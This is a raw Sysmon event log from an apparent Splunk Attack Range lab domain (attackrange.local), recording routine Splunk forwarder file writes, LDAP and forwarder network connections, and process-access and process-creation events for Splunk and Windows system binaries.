07:49:15.917{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB8E6F6BDCB6B25FF15D36EA9D0EF577,SHA256=C2AA4B7DF84541257BA51F9DD6EAF7EFA6E3C6469F522A76B320C3751C83EA32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:15.419{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=527EA0D914CEBC22A2022B8669CDE20A,SHA256=6C4C2B0339820C1BCF972A67E5D969117645541F05001FAA04BE4E753D0D752B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806979Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:16.934{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3A40D1EBCB8C56CC25F4F4F46F5E12B,SHA256=348CE09A0E4E564814A37059E75727DF00FD664242D858C18819EA35A4637657,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:16.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BF02F8B2044BC524A86E85083CD0B6C,SHA256=51A294AEB4439CC6E675A1450CC952139E79566A6E41374967287400D721498B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:07.919{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50984-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001047797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:07.918{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local50984-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001047801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:17.950{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C2BBCF1209C464FC88577D714CCE569,SHA256=09B3D51EA88C4BDEE6B7FD0D698B551B327EC9B222E742581461A02DAEF8F790,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806980Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:17.981{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37A6D07EEB2B4DC5D9B96C635B3108AE,SHA256=3E108DF114FD1A671EAC259B49C3EAB33E729202A5C8AF46D084C690672E9B4D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:08.649{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50985-false10.0.1.12-8000- 23542300x8000000000000000806981Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:18.997{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=898E9A9390C4E957CFE351F582AB2A5B,SHA256=9B10DDB59CBC2043FA92485ADFD2E51BAD4C3993C9D9B3699E4C23C68E08B5FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:18.951{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6692D6BDAE1BE8A87009EEF60E985D8A,SHA256=24BEA7A2126BB0D614F1D195F42CA1AE215936AB832AC4F55480B97F9E71B0DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:18.234{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:19.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=047112E1B8BBEF04BE264E32BFFBA697,SHA256=79BE273DFD78FA589C1AE82DF0A8BBFC748A55DE89AB7CE7B94E24093023E23F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:20.981{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD5EE82A6D1CED11B733AFA8A595395,SHA256=914CEBA1BC4CAB17043E3A0503AFB6CC64A4A6FD60F0AD0ADE38D8B05FFE7D9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806983Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.419{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806982Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.013{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0EE41D3D1C3E441288C264092BAC608,SHA256=30C91985F750AB6FF4C8055752C79AB6D4AD779E23E7937738E277850AA2E318,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806984Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:21.028{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF7D6E45F89C742C88BCA9B6B7E13496,SHA256=469F80313FEB9434F04D1CA50BC01E141F2303A63B399FA8D154B08EACF3F83F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:22.649{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29120A9617EBEDE0A5C1489BBBA39752,SHA256=3029307A241062588FA950E6A17AC7CC5B5917FDA7E2A4C18E753F05D3195B6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:22.649{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9C5150E69351C058A09139EFE8B5B812,SHA256=961C110E5E3A80394BE126F24519DC2B4257DE892C30825F294B6665A44C5E8B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:14.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50986-false10.0.1.12-8000- 23542300x80000000000000001047806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:22.014{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D1409A08E5A504EDF72071892A56C6,SHA256=21DA47B27F45F2D068696F60E8CD906D00A1F0812654AB7E26B22BF1C5D432E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806987Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.552{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57227-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000806986Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:20.208{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57226-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806985Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:22.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CDC56E02D5C7B6092F1DCD7B84961DB,SHA256=8BEA340D15793062D6D6B3607303C3E8FA4F52E59A4D16209DCECF3153604D3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:23.033{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2594C645DDE8027223F1D77B9B835919,SHA256=3E701F865E76E9AF3B3BE2B738035515C2C648C6C5DE909BA5DB31A74D12170E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806988Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:23.044{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59E64008EAB2048E7AD30F4C0F651106,SHA256=78699389E658B847189C25B1429DFD70EF28A9A32A527831FF4A1212C09E6ED7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000807015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807012Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807011Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807010Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807009Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807008Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.950{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807007Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.934{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807006Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:49:24.934{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000807005Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.934{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000807004Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.934{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000807003Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.935{0C1E0330-F404-60EB-5F79-00000000D001}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000807002Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:24.263{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F404-60EB-5E79-00000000D001}3136C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
